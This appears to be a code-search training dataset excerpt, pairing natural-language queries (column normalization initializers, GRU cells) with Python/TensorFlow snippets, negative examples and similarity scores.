"0.5460833", "0.5450298", "0.5446891", "0.54448014", "0.5439602", "0.5439279", "0.54329705", "0.5429896", "0.54283524", "0.5394968", "0.5394968", "0.5394968", "0.5394968", "0.5394968", "0.5390242", "0.5390242", "0.53760993", "0.53760993", "0.5375277", "0.5372566", "0.5372323", "0.53713405", "0.53676844" ]
0.55198646
68
Initialize with normalized columns
def normc_init(std=1.0, axis=0):
    def _initializer(shape, dtype=None, partition_info=None):  # pylint: disable=W0613
        out = np.random.randn(*shape).astype(np.float32)
        out *= std / np.sqrt(np.square(out).sum(axis=axis, keepdims=True))
        return tf.constant(out)
    return _initializer
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def build_normalized(self):\n for row, s in enumerate(self.S):\n for col, t in enumerate(self.T):\n\n if self.symmetric and row > col:\n pass\n\n elif self.symmetric and row == col:\n self.normalized_mat[row, col] = 1\n\n else:\n self.normalized_mat[row, col] = self.normalize(row, col)\n\n if self.symmetric:\n self.normalized_mat = self.symmetrize(self.normalized_mat)", "def normalize_dataset(self):", "def normalize_columns_together(headers, data):\n\tcolumn_matrix=data.get_data(headers)\n\tmax=column_matrix.max()\n\tprint \"The maximum:\t \", max\n\tmin=column_matrix.min()\n\tprint \"The minimum:\t \", min\n\trange=max-min\n\tprint \"range: \", range\n\tcolumn_matrix=column_matrix-min\n\tnormalized=column_matrix/range\n\treturn normalized", "def __init__(self,columns_to_fix=[],convert_dict={'Y':1,'N':0}):\n self.columns_to_fix = columns_to_fix\n self.convert_dict = convert_dict", "def normalize_columns_separately(headers, data):\n\tcolumn_matrix=data.get_data(headers)\n\tcolumn_max=column_matrix.max(1)\n\tcolumn_min=column_matrix.min(1)\n\trange=column_max-column_min\n\tnomalized=(column_matrix-column_min)/range\n\treturn nomalized", "def test_default_columns(self):\n expected = self.df.columns\n actual = self.normalizer().normalize(\n self.df, **self.kwargs).columns\n\n expected = sorted(expected)\n actual = sorted(actual)\n self.assertListEqual(actual, expected)", "def normalize(merged_table):\r\n #add normalization\r\n # Minimum\r\n min_val = merged_table['covid_cases'].min()\r\n\r\n # Maximum\r\n max_val = merged_table['covid_cases'].max()\r\n\r\n # Calculate a normalized column\r\n normalized = (merged_table['covid_cases'] - min_val) / (max_val - min_val)\r\n\r\n # Add to the dataframe\r\n merged_table['n_covid'] = normalized\r\n return merged_table", "def normalize(self, df):\n return df / df.ix[0, :]", "def initialize(self, col):\n\t\treturn []", "def __init__(self,columns_to_fix=[],rows_to_scan='all',keep_dummies=False):\n self.columns_to_fix = columns_to_fix\n self.rows_to_scan = rows_to_scan\n self.keep_dummies = keep_dummies", "def scalarNormalizer(df):\r\n arr=dict()\r\n for col in CONT_FEATURES_COL_TO_USE:\r\n mean, std =df[col].mean(), df[col].std()\r\n df[col]=df[col].apply(lambda x: (x-mean)/std)\r\n arr[col] = [mean, std]\r\n json.dump(arr, open('normalize.json', 'w'))\r\n return df", "def _init_(self, input_column, output_column):\n super()._init_([input_column], output_column)", "def normalize_columns(df, colnames):\r\n for col in colnames:\r\n s = df[col]\r\n df[col] = s.sub(s.min()).div((s.max() - s.min()))\r\n print(f'''Normalized Columns: {colnames}''')\r\n\r\n return df", "def normalize(self, board):\n self.normalize_columns(board)\n return board", "def map_cols_to_attr(self):\n ## this is from the base class:\n ## for attr, label in zip(self.attr_names, self.labels):\n ## col_ind = self.col_inds[label]\n ## if len(self.data) > 0:\n ## setattr(self, attr, self.data[:,col_ind])\n #\n # hard coding based on what I know about saleae files:\n self.t = self.data[:,0]#.astype(float)\n nr, nc = self.data.shape\n self.num_cols = nc-1\n \n for i in range(0,self.num_cols):\n attr = 'ch_%i' % i\n j = i+1\n setattr(self, attr, self.data[:,j])#.astype(float))", "def normalize_data(df):\r\n return df/df.ix[0,:]", "def __init__(self, X_columns, X_dtypes):\n self.X_columns = X_columns\n self.X_dtypes = X_dtypes", "def normalize_data(df):\n return df / df.ix[0,:]", "def normalize_data(df):\n return df / df.ix[0,:]", "def normalize_columns(mat):\n norm = 
np.sqrt((mat**2).sum(0))\n return mat / norm", "def df_normalizer(df):\n df = tf.keras.utils.normalize(df, axis=1)\n\n return df", "def get_cols_dummy():", "def __init__(self,columns_to_fix=[],rows_to_scan='all'):\n self.columns_to_fix = columns_to_fix\n self.rows_to_scan = rows_to_scan", "def normalize_data(self):\r\n # quantify data for each column except classification column for noise reduction\r\n for column_header in self.classification_training_data.columns:\r\n if column_header == \"Class\":\r\n continue\r\n if column_header == \"Age\":\r\n bin_size = 2\r\n elif column_header == \"Ht\":\r\n bin_size = 5\r\n else:\r\n bin_size = 1\r\n for idx in self.classification_training_data.index:\r\n self.classification_training_data.at[idx, column_header] = math.floor(\r\n self.classification_training_data[column_header][idx] / bin_size) * bin_size", "def normalise(raw_data, normalise_by_column=False):\n data = raw_data\n if normalise_by_column:\n #normaliza valores usando o maximo de cada coluna\n col_maxes = raw_data.max(axis=0)\n #divide cada valor pelo maximo correspondente de cada coluna\n data = raw_data / col_maxes[np.newaxis,:] \n else:\n #divide todos os valores pelo maximo do dataset (tudo na mesma escala)\n data = raw_data / raw_data.max()\n\n return data", "def __init__(self,columns_to_fix=[]):\n self.columns_to_fix = columns_to_fix", "def columns_setup(self):\n self.required = None\n self.addition = None\n self.deletion = None\n self.retention = None\n self.rename = None", "def init_model_df(self):\n\n self.model_df = pd.DataFrame(columns=self.query_df[self.column_name].unique())\n\n # add _TIMESTAMP column to dataframe\n self.model_df[self.column_index] = self.min_increments\n\n # set row index to _TIMESTAMP\n self.model_df.set_index(self.column_index, inplace=True)", "def __init__(self, columns=()):\n self.columns = list(columns)\n\n # Create internal dictionary for faster access\n self.column_dict = {}\n\n for column in self.columns:\n self.column_dict[column.column_id] = column", "def normalize(self):\n d = learning_utils.convert_data_to_2d(self._data)\n d = learning_utils.normalize_2d(d)\n self._data = learning_utils.convert_data_to_1d(d)", "def normalize(self):\n\n pass", "def normalize(df):\n comm_keys = list( set(df.keys()) & set(KEYS_FOR_NORM) )\n\n ret_df = df.copy()\n t = ret_df[comm_keys]\n ret_df[comm_keys] = (t - t.mean()) / t.std()\n\n return ret_df", "def normalize_data(data_frame):\n min_max_scaler = preprocessing.MinMaxScaler()\n x_scaled = min_max_scaler.fit_transform(data_frame)\n return pd.DataFrame(x_scaled)", "def normalizeColumns(W):\n for i in range(W.shape[1]):\n W[:, i] /= np.linalg.norm(W[:, i]) + 0.001\n\n return W", "def normalize_price_values(df):\r\n\r\n\tdf_normalize_dict = dict()\r\n\r\n\tfor i, col in enumerate(df.columns):\r\n\t\tcol_array = np.array(df[col])\r\n\t\tdf_normalize_dict[\"Normalized\" + col] = preprocessing.normalize([col_array])[0]\r\n\r\n\tdf_normalize = pd.DataFrame(df_normalize_dict, index=df.index)\r\n\tpd.set_option('precision', 2) # set output display precision in 2 decimal places\r\n\r\n\treturn df_normalize", "def normalize_fields(self, col=True, row=True):\n\n if isinstance(col, int) and not isinstance(col, bool):\n self.col = col\n else:\n if col is True:\n self.col = self.START_COL\n if isinstance(row, int) and not isinstance(row, bool):\n self.row = row\n else:\n if row is True:\n self.row = self.START_ROW\n\n if self.row is True or self.col is True:\n raise ValueError(\"self.last_row is: %d and self.last_col is: %d\" 
% (self.row, self.col))", "def _localNormalizeData(self,values,names,feat):\n self.muAndSigmaFeatures[feat] = (0.0,1.0)", "def _normalize(self, dataset):\n if self.max is None: # if we are normalizing the training set\n self.max, self.min = dataset.max(), dataset.min() # find max, min value for each columns\n for row in dataset.index: # for each row in dataset\n for col in self.features: # for each feature in the instance (exclude target)\n dataset.at[row, col] = (dataset.at[row, col] - self.min[col]) / (self.max[col] - self.min[col]) if col != \"Bias\" else 1", "def normalize_data(self, df):\n result = df.copy()\n for feature_name in self.continuous_feature_names:\n max_value = self.train_df[feature_name].max()\n min_value = self.train_df[feature_name].min()\n result[feature_name] = (\n df[feature_name] - min_value) / (max_value - min_value)\n return result", "def prepare_table(table):\n n = len(table)\n for i, row in enumerate(table):\n assert len(row) == n, f\"len(row) = {len(row)} != {n} = n\"\n for j, _ in enumerate(row):\n if i == j:\n table[i][i] = 0.0\n elif i > j:\n table[i][j] = 1 - table[j][i]\n return table", "def normalize_features(dataframe):\n print(\"Normalizing feature matrix...\")\n tmp = dataframe\n feats = tmp.drop(columns=['year', 'county'])\n fmax = feats.max()\n fmin = feats.min() \n # normalize the feature matrix\n feats = (feats - fmin) / (fmax - fmin)\n tmp[feats.columns] = feats\n\n return tmp", "def test_column_missing(self):\n columns = self.normalizer().config['columns']\n for column in columns:\n df = self.df.copy()\n df = df.drop(column, axis=1)\n with self.assertRaises(ValueError):\n self.normalizer().normalize(df, **self.kwargs)", "def pre_process_data_set(df):\n df.replace([np.inf, -np.inf], np.nan)\n df[df == np.inf] = np.nan\n df = remove_bad_columns(df)\n df = fill_na(df)\n df = convert_factorial_to_numerical(df)\n\n # Remove columns only containing 0\n df = df[(df.T != 0).any()]\n return df", "def _init_table(self, table: \"Table\"):\n if not self.columns:\n self.columns = table.columns\n self._data = table.data", "def de_normalize_data(self, df):\n if len(df) == 0:\n return df\n result = df.copy()\n for feature_name in self.continuous_feature_names:\n max_value = self.permitted_range[feature_name][1]\n min_value = self.permitted_range[feature_name][0]\n result[feature_name] = (\n df[feature_name]*(max_value - min_value)) + min_value\n return result", "def normalize(column):\n value_set = set(column)\n unique_count = len(value_set)\n if unique_count == 1:\n # skip everything in this column. 
\n return []\n elif unique_count == 2:\n zero = list(value_set)[0]\n one = list(value_set)[1]\n normalized_column = []\n for value in column:\n normalized_column.append(1 if value == one else 0)\n return [normalized_column]\n else: \n all_values = list(value_set)\n normalized_column = []\n\n # expand into multiple columns \n for index in range(len(all_values)):\n normalized_column.append([])\n\n for value in column:\n for index in range(len(all_values)):\n normalized_column[index].append(1 if value == all_values[index] else 0)\n \n return normalized_column", "def __init__(self, **values):\r\n self.eid = values.get('_id')\r\n self._values = {}\r\n for name, column in self._columns.items():\r\n value = values.get(name, None)\r\n if value is not None:\r\n value = column.to_python(value)\r\n value_mngr = column.value_manager(self, column, value)\r\n self._values[name] = value_mngr", "def unnormalize(self, inputs: Tensor) -> Tensor:\n # The normalizing constants are applied to the entire row, so add dummy outputs to the\n # inputs to make a row.\n row = torch.zeros_like(self._row_range)\n row[self._input_column_indices] = inputs\n row *= self._row_range\n row += self._row_min\n return row[self._input_column_indices]", "def _normalize(self, data):\n norm_data = []\n\n for row in data:\n norm_row = []\n\n for column in row:\n # custom format strings for specific objects\n if isinstance(column, float):\n format_str = '{{:.{}f}}'.format(2)\n item = format_str.format(column)\n\n elif isinstance(column, datetime):\n item = column.strftime('%Y-%m-%d %H:%M')\n\n else:\n item = str(column)\n\n norm_row.append(item)\n\n norm_data.append(norm_row)\n\n return norm_data", "def normalize(dataset):\n minVals = dataset.min(axis=0)\n maxVals = dataset.max(axis=0)\n factors = maxVals-minVals\n num = dataset.shape[0]\n norm_data = (dataset - np.tile(minVals,(num,1)))/np.tile(factors,(num,1)) \n return norm_data", "def normalize(col):\n maximum=df[col].max()\n minimum=df[col].min()\n for index,row in df.iterrows():\n df.ix[index,col]=(row[col]-minimum)/(maximum-minimum)", "def init_columns(cycle_df, datatype):\n (cycle_ind_col, data_point_col, volt_col, curr_col, dis_cap_col, char_cap_col, charge_or_discharge) = col_variables(datatype)\n assert type(cycle_df) == pd.DataFrame\n assert volt_col in cycle_df.columns\n assert dis_cap_col in cycle_df.columns\n assert char_cap_col in cycle_df.columns\n\n cycle_df = cycle_df.reset_index(drop=True)\n cycle_df['dV'] = None\n cycle_df['Discharge_dQ'] = None\n cycle_df['Charge_dQ'] = None\n #cycle_df['Discharge_dQ/dV'] = None\n #cycle_df['Charge_dQ/dV'] = None\n return cycle_df", "def _normalize(self):\r\n self.dataframe['norm_intensity'] = self.dataframe['intensity']\r\n self.dataframe['norm_intensity'] -= self.dataframe['norm_intensity'].min()\r\n self.dataframe['norm_intensity'] /= self.dataframe['norm_intensity'].max() * 0.01", "def normalize_values(self, data):\n\n df = pd.DataFrame(data[1:], columns = data[0]).astype(str)\n\n df = df.replace(ami_md_constants.NAS)\n\n df = df.replace(ami_md_constants.REGEX_REPLACE_DICT, regex=True)\n df = df.replace(ami_md_constants.STRING_REPLACE_DICT)\n df['source.object.format_type'] = df['source.object.format'].map(ami_md_constants.FORMAT_TYPE)\n\n for key in ami_md_constants.MEASURE_UNIT_MAPS.keys():\n value_map = ami_md_constants.MEASURE_UNIT_MAPS[key]\n df = self.map_value(df,\n value_map['from_column'],\n value_map['to_column'],\n value_map['constant_value'],\n value_map['values_map_column'],\n value_map['values_map'])\n\n #force 
all the numerics back to numeric, and drop all empty columns\n df = df.apply(pd.to_numeric, errors='ignore').dropna(axis=1, how = \"all\")\n\n vals = df.values.tolist()\n cols = df.columns.tolist()\n vals.insert(0, cols)\n\n return vals", "def __init__(self, columns):\n self.columns = columns\n self.rows = []", "def setcolumns(self, columns):\n\n # Store the column titles (\"raw\" format)\n # This is a list of white-space separated strings\n self.__columns = columns\n # Create table_column objects\n for col in columns.split():\n self.addcolumn(col)\n # Attempt to populate the column objects\n if self.__data:\n self.__populate_columns()\n self.__nonzero = True", "def normalize(self):\n self.number_of_vectors = self.values.shape[0]\n norm_2 = np.linalg.norm(self.values, axis=1)\n norm_1 = np.sum(self.values_planar, axis=1)\n norm_2 = np.repeat(norm_2, self.number_of_objectives).reshape(\n self.number_of_vectors, self.number_of_objectives\n )\n norm_1 = np.repeat(norm_1, self.number_of_objectives).reshape(\n self.number_of_vectors, self.number_of_objectives\n )\n norm_2[norm_2 == 0] = np.finfo(float).eps\n self.values = np.divide(self.values, norm_2)\n self.values_planar = np.divide(self.values_planar, norm_1)", "def _init_dict(self, data: Dict[Column, Row]):\n if not self._columns:\n self._columns = list(data.keys())\n\n # Filter values by defined columns\n columns = (\n to_list(values)\n for column, values in data.items()\n if column in self._columns\n )\n\n # Convert columns to rows\n self._data = [list(row) for row in zip_longest(*columns)]", "def column_convertor(x):\n x.shape = (1, x.shape[0])\n return x", "def normalise_zero_base(df):\n return df / df.iloc[0] - 1", "def normalise_zero_base(df):\n return df / df.iloc[0] - 1", "def normalize_ds(dataset):\n dataset = copy.copy(dataset)\n\n dim_dataset = dataset.shape\n\n for n_row in range(dim_dataset[0]):\n k = dataset[n_row,:]\n k_norm =(k - np.min(k))/(np.max(k) - np.min(k))\n dataset[n_row,:] = k_norm\n\n return dataset", "def __init__(self, columns=None, labels=None):\n self._columns = collections.OrderedDict()\n self._formats = dict()\n if not columns:\n assert not labels, 'labels but no columns'\n columns, labels = [], []\n if isinstance(columns, collections.abc.Mapping):\n assert labels is None, 'labels must be None if columns has labels'\n columns, labels = columns.values(), columns.keys()\n assert labels is not None, 'Labels are required'\n assert len(labels) == len(columns), 'label/column number mismatch'\n for column, label in zip(columns, labels):\n self[label] = column", "def from_dict(self, data: dict):\n super().from_dict(data)\n if self.data is not None:\n try:\n self.data[\"columns\"] = np.array(\n [int(col) for col in self.data[\"columns\"]]\n )\n except:\n pass\n self.data = pd.DataFrame(\n data=self.data[\"data\"],\n columns=self.data[\"columns\"],\n index=self.data[\"index\"],\n )", "def normalize(self) -> None:\n assert hasattr(self, \"characterized_inventory\"), \"Must do lcia first\"\n if not hasattr(self, \"normalization_matrix\"):\n self.load_normalization_data()\n self.normalization_calculation()", "def normalized_rankings(df, columns=['Lust', 'Envy', 'Greed', 'Sloth', 'Wrath',\n 'Pride', 'Gluttony']):\n df[columns] = (df[columns] - 4) / 2 # hard coding n=7 case for now", "def norm_data(self):\n if (self.nrows, self.ncolumns) < self.data.shape:\n self.data = self.data[0:self.nrows, 0:self.ncolumns]\n if self.data.dtype != np.float64:\n self.data = self.data.astype(np.float64)\n self.meanval = self.data.mean()\n 
self.stdval = self.data.std()", "def normalize(self, df):\n return (df - df.mean()) / (df.max() - df.min())", "def __init__(self):\n super().__init__(\n func=lambda x: pandas.DataFrame((x - x.min()) / (x.max() - x.min())),\n feature_names_out=\"one-to-one\",\n validate=True,\n )\n return None", "def normalize(data):\n # normalize data and return\n # https://stackoverflow.com/questions/29661574/normalize-numpy-array-columns-in-python\n return (data - data.min(axis=0)) / data.ptp(axis=0)", "def normalise(x):\n x = np.copy(x)\n n_cols = x.shape[1]\n for col_index in range(n_cols):\n col = x[:, col_index]\n factor = np.max(col)\n x[:, col_index] = col / factor\n\n return x", "def unscale(self, columns):\n self.verify_columns_in_dataset(columns)\n\n for col in columns:\n scaler, scaled = self.scalers.get(col, (0, 0))\n if not scaled:\n logging.info(\"column '%s' has not been scaled, ignoring\" % col)\n continue\n\n self.train.loc[:, col] = scaler.inverse_transform(self.train[col])\n self.test.loc[:, col] = scaler.inverse_transform(self.test[col])\n self.scalers[col][1] = False # mark not scaled", "def _make_blank(cls) -> pd.DataFrame:\n spec = list(zip(cls._required_columns, cls._required_dtypes))\n try:\n arr = np.zeros(0, dtype=spec)\n return pd.DataFrame(arr)\n except TypeError as exc:\n raise TypeError(r\"{exc}: {spec}\") from exc", "def init_from_data(self, data):\n self.data = data\n self.norm_data()", "def __init__(self, columns): #, length_scale, length_scale_bounds=()):\n# assert isinstance(column, (list, tuple, int)), \"must be int or list of ints\"\n# self.column = [column] if isinstance(column, int) else column\n# assert all(isinstance(i, int) for i in self.column), \"must be integers\"\n self.columns = columns \n\n kernels = [Projection([c]) for c in columns]\n #factor_name(c)) for c in columns]\n \n # collect all the kernels to be combined into a single product kernel\n super(SimpleFactorKernel, self).__init__(kernels)", "def as_columns(self, **columns):\n return self.__class__.from_columns(columns, self.meta)\n # return self.__class__(self.data.loc[:, columns], self.meta.copy())", "def own_MinMaxColumnScaler(df, columns):\n for col in columns:\n new_col_name = col + '_scld'\n col_min = df[col].min()\n col_max = df[col].max()\n df[new_col_name] = (df[col] - col_min) / (col_max - col_min)", "def normalizeRows(x):\n\n ### YOUR CODE HERE\n norm2 = np.linalg.norm(x,2,axis = 1).reshape(x.shape[0],-1)\n x = x/norm2\n ### END YOUR CODE\n\n return x", "def prepare_input_df(df: DataFrame) -> DataFrame:\r\n df = df.fillna('') # Fill np.nan values with blanks (\"\").\r\n df = to_upper(df) # Force case to UPPER for all columns.\r\n df = strip_columns(df) # Remove trailing whitespace.\r\n return df", "def data_column_conversion(data:pandas.core.frame.DataFrame) -> pandas.core.frame.DataFrame:\n data = data.assign(W = (data.label == 'W') + 0,D = (data.label == 'D') + 0,L = (data.label == 'L') + 0)\n data = data.drop(\"label\",axis=1)\n return data", "def normalize(self):\n self.length = np.ones(self.nV)\n return self", "def init_columns(self, project, columns):\n self.projects.update_entry(pk=project, project={\"columns\": []}).result()\n cols = []\n\n for path, unit in columns.items():\n col = {\"path\": f\"data.{path}\"}\n if unit is not None:\n col[\"unit\"] = unit\n\n cols.append(col)\n\n return self.projects.update_entry(\n pk=project, project={\"columns\": cols}\n ).result()", "def prepopulate(self, model, exclude=[]):\n for col in model.columns():\n if col not in exclude and 
hasattr(self, col):\n setattr(getattr(self, col), 'data', getattr(model, col))", "def fromTable(cls, table):\n cls.__attrmap__ = {}\n cls.__colmap__ = {}\n allColumns = list(table)\n for column in allColumns:\n attrname = cls.namingConvention(column.model.name)\n cls.__attrmap__[attrname] = column\n cls.__colmap__[column] = attrname", "def normalize(self):\n self.desc += \", normalize\"\n self._vecs /= np.linalg.norm(self._vecs, axis=1)[:, np.newaxis]\n self.reindex()", "def __clean_df(self):\n self.__convert_min()", "def normalize(self,matrix):\n for i in range(self.N):\n matrix[self.N-1][i] = 0\n for i in range(self.n):\n matrix[self.N - 1][self.index(i,i)] = 1\n return matrix", "def normalize (a_data,a_column,b_method='MinMax') :\n if b_method == 'MinMax' :\n loc_scaler = __minmax()\n a_data[a_column] = loc_scaler.fit_transform(a_data[a_column])\n elif b_method == 'Standard' :\n loc_scaler = __standard()\n a_data[a_column] = loc_scaler.fit_transform(a_data[a_column])", "def __init__(self, *args, **kwargs):\n \n self.dense = True\n\n # Create table\n super().__init__(*args, **kwargs)", "def fit(self, col_df: dd.Series) -> Any:\n\n self.min = col_df.min()\n self.max = col_df.max()\n return self", "def __init__(self, data, columns):\n super().__init__()\n self._filters = {}\n self._columns = [Column(column) for column in columns]\n self._source = pd.DataFrame(data, columns=[column.name for column in self._columns], dtype=str)\n # Change columns datatypes\n for name, type in [(column.name, column.type) for column in self._columns]:\n if type == 'NUMBER':\n self._source[name] = self._source[name].astype('float')\n elif type == 'INTEGER':\n # self._source[name] = self._source[name].round()\n self._source[name] = self._source[name].astype('float')\n self._source[name].fillna(float(0), inplace=True)\n self._source[name] = self._source[name].astype(int)\n elif type in ['DATE', 'DATETIME', 'TIME']:\n self._source[name] = pd.to_datetime(self._source[name])\n elif type == 'BOOL':\n self._source[name] = self._source[name].apply(lambda x: str(x).upper() == 'TRUE').astype('bool')\n\n self._visable_columns = [column.name for column in self._columns if\n column.title is not None and column.visable == True]\n self._dataframe = self._source.loc[:, self._visable_columns]", "def create_dummies(df):", "def norm_data(df):\n cols = df.columns\n sum = df.sum(axis=1)\n df_new = df.loc[:,cols[1]:cols[-1]].div(sum, axis=0)\n return df_new", "def normalize_distancematrix(self):\n INF = self.distmat.max().max()\n df = self.distmat.fillna(INF)\n self.distmat = (df - df.min()) / (df.max() - df.min())", "def __init__(self, df, categorical_columns):\n self.num_to_name = {}\n self.name_to_num = {}\n for c in categorical_columns:\n self.num_to_name[c] = dict(enumerate(df[c].unique()))\n self.name_to_num[c] = {v: k for k, v in self.num_to_name[c].items()}", "def _normalize_column(self, data, coerce_dtype=None, store_categories=True):\n if coerce_dtype is not None:\n coerce_dtype = np.dtype(coerce_dtype)\n\n if np.isscalar(data):\n array = np.array([data], dtype=coerce_dtype)\n dtype = data.dtype\n fillvalue = None\n\n elif is_categorical(data):\n if store_categories:\n cats = data.cat.categories\n enum_dict = dict(zip(cats, range(len(cats))))\n array = data.cat.codes\n dtype = h5py.special_dtype(enum=(array.dtype, enum_dict))\n fillvalue = -1\n else:\n array = data.cat.codes\n dtype = coerce_dtype or array.dtype\n fillvalue = -1\n\n elif data.dtype in (object, str, bytes):\n data = np.asarray(data)\n dtype = 
np.dtype(\"S\")\n array = np.array(data, dtype=dtype)\n fillvalue = None\n\n else:\n array = np.asarray(data)\n dtype = data.dtype\n fillvalue = None\n\n return array, dtype, fillvalue", "def replace(self, dictionary):\n for column in self.__table__.columns.keys():\n setattr(self, column, None)\n self.from_dict(dictionary)", "def unscale(self, columns):\n self.verify_columns_in_dataset(columns)\n\n for col in columns:\n scaler, scaled = self.scalers.get(col, (0, 0))\n if not scaled:\n logging.info(\"column '%s' has not been scaled, ignoring\" % col)\n continue\n\n self.dataset.loc[:, col] = \\\n scaler.inverse_transform(self.dataset[col])\n self.scalers[col][1] = False", "def __init__(self, colinds):\n self._colinds = colinds", "def __init__(self, columns, values=[], row_number=None, source_row_number=None):\n self.columns = columns\n self.values = copy.copy(values)\n self.row_number = row_number\n self.source_row_number = source_row_number", "def normalizeRows(x):\n\n ### YOUR CODE HERE\n # using l2 norm to normalize\n x = x / np.sqrt(np.sum(x * x, axis=-1, keepdims=True))\n ### END YOUR CODE\n\n return x" ]
[ "0.62527007", "0.61988616", "0.6170687", "0.6163979", "0.601633", "0.59947926", "0.5964604", "0.59518266", "0.5946991", "0.5934487", "0.5933899", "0.59310675", "0.59298176", "0.587819", "0.5838801", "0.5835919", "0.5826909", "0.5814432", "0.5814432", "0.5799486", "0.5779557", "0.5776756", "0.5772984", "0.576165", "0.574795", "0.5745722", "0.5740217", "0.5739378", "0.5730491", "0.5724968", "0.5720187", "0.5710221", "0.5690427", "0.5676085", "0.5670871", "0.5657949", "0.5638853", "0.56357366", "0.56276315", "0.56275976", "0.5603842", "0.5594656", "0.5589582", "0.55653214", "0.5565045", "0.5556466", "0.5546937", "0.5546363", "0.5542289", "0.55396205", "0.55374503", "0.55364865", "0.55252105", "0.5524995", "0.5513348", "0.5498207", "0.54932594", "0.5486765", "0.54850656", "0.54739827", "0.54739827", "0.54636705", "0.54472536", "0.5441863", "0.5434735", "0.5432687", "0.5420312", "0.5408455", "0.5406406", "0.54042804", "0.5399645", "0.5399614", "0.5398987", "0.5398797", "0.53929716", "0.53845245", "0.53809965", "0.53785825", "0.5374447", "0.5361605", "0.5359702", "0.53592736", "0.5357277", "0.53546405", "0.5351229", "0.534927", "0.5337756", "0.53353906", "0.53298074", "0.5326293", "0.5322299", "0.53159064", "0.5313394", "0.5308091", "0.5294137", "0.5291782", "0.52847874", "0.5283369", "0.5282616", "0.52786386", "0.52775395" ]
0.0
-1
Gated recurrent unit (GRU) with nunits cells.
def call(self, inputs, state):
    x, new = inputs
    while len(state.get_shape().as_list()) > len(new.get_shape().as_list()):
        new = tf.expand_dims(new, len(new.get_shape().as_list()))
    h = state * (1.0 - new)
    hx = tf.concat([h, x], axis=1)
    mr = tf.sigmoid(tf.matmul(hx, self.w1) + self.b1)  # r: read strength. m: 'member strength
    m, r = tf.split(mr, 2, axis=1)
    rh_x = tf.concat([r * h, x], axis=1)
    htil = tf.tanh(tf.matmul(rh_x, self.w2) + self.b2)
    h = m * h + (1.0 - m) * htil
    return h, h
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def build_gru_cell(num_units, dropout):\n cell = tf.nn.rnn_cell.GRUCell(num_units)\n if dropout:\n result = tf.nn.rnn_cell.DropoutWrapper(cell,\n output_keep_prob=1-dropout)\n return result", "def _initialize_gru_cell(self, num_units):\n return gru_cell.LayerNormGRUCell(\n num_units,\n w_initializer=self.uniform_initializer,\n u_initializer=random_orthonormal_initializer,\n b_initializer=tf.constant_initializer(0.0))", "def GRU(previous_hidden_state, x):\n # R Gate\n r = tf.sigmoid(tf.matmul(x, Wr) + \\\n tf.matmul(previous_hidden_state, Ur) + br)\n # U Gate\n u = tf.sigmoid(tf.matmul(x, Wu) + \\\n tf.matmul(previous_hidden_state, Uu) + bu)\n # Final Memory cell\n c = tf.tanh(tf.matmul(x, Wh) + \\\n tf.matmul( tf.multiply(r, previous_hidden_state), Uh) + bh)\n # Current Hidden state\n current_hidden_state = tf.multiply( (1 - u), previous_hidden_state ) + \\\n tf.multiply( u, c )\n return current_hidden_state", "def G(U):\n n = U.shape[0]\n G_U = np.zeros([n,1])\n DELTA_x = float(2*L)/(n-1)\n for i in range(n):\n G_U[i][0] = U[(i+1)%n][0]\n G_U[i][0] -= U[(i-1)%n][0]\n G_U[i][0] /= (2* DELTA_x)\n G_U[i][0] += (float(epsilon) * (U[(i+1)%n][0]- U[(i-1)%n][0]) * (U[(i-1)%n][0]+U[(i+1)%n][0]+ U[i][0])/ (4* DELTA_x))\n G_U[i][0] += (float(epsilon) * (U[(i+2)%n][0]- 2*U[(i+1)%n][0]+ 2*U[(i-1)%n][0]- U[(i-2)%n][0]) / (12*( DELTA_x**3)))\n return G_U", "def ug(micrograms):\n return Unit(micrograms,\"microgram\")", "def _single_cell(num_units,\n dropout,\n mode,\n residual_connection=False,\n device_str=None):\n dropout = dropout if mode == tf.estimator.ModeKeys.TRAIN else 0.0\n\n # Cell Type\n utils.print_out(\" GRU\", new_line=False)\n single_cell = tf.nn.rnn_cell.GRUCell(num_units)\n\n # Dropout (= 1 - keep_prob)\n if dropout > 0.0:\n single_cell = tf.nn.rnn_cell.DropoutWrapper(\n cell=single_cell, input_keep_prob=(1.0 - dropout))\n utils.print_out(\n \" %s, dropout=%g \" % (type(single_cell).__name__, dropout),\n new_line=False)\n\n # Residual\n if residual_connection:\n single_cell = tf.nn.rnn_cell.ResidualWrapper(single_cell)\n utils.print_out(\" %s\" % type(single_cell).__name__, new_line=False)\n\n # Device Wrapper\n if device_str:\n single_cell = tf.nn.rnn_cell.DeviceWrapper(single_cell, device_str)\n utils.print_out(\n \" %s, device=%s\" % (type(single_cell).__name__, device_str),\n new_line=False)\n\n return single_cell", "def grid_unit_cell(self):\n from cctbx import uctbx\n a = self.unit_cell_parameters[0] / self.unit_cell_grid[0]\n b = self.unit_cell_parameters[1] / self.unit_cell_grid[1]\n c = self.unit_cell_parameters[2] / self.unit_cell_grid[2]\n alpha,beta,gamma = self.unit_cell_parameters[3:6]\n return uctbx.unit_cell((a,b,c,alpha,beta,gamma))", "def num_grna(self) -> int:\n return len(self.gRNAs)", "def get_u0_g(self, gmag):\n return self.ginterpolator(gmag)", "def gru_cell(self, Xt, h_t_minus_1):\n # 1.update gate: decides how much past information is kept and how much new information is added.\n z_t = tf.nn.sigmoid(tf.matmul(Xt, self.W_z) + tf.matmul(h_t_minus_1,self.U_z) + self.b_z) # z_t:[batch_size,self.hidden_size]\n # 2.reset gate: controls how much the past state contributes to the candidate state.\n r_t = tf.nn.sigmoid(tf.matmul(Xt, self.W_r) + tf.matmul(h_t_minus_1,self.U_r) + self.b_r) # r_t:[batch_size,self.hidden_size]\n # candiate state h_t~\n h_t_candiate = tf.nn.tanh(tf.matmul(Xt, self.W_h) +r_t * (tf.matmul(h_t_minus_1, self.U_h)) + self.b_h) # h_t_candiate:[batch_size,self.hidden_size]\n # new state: a linear combine of pervious hidden state and the current 
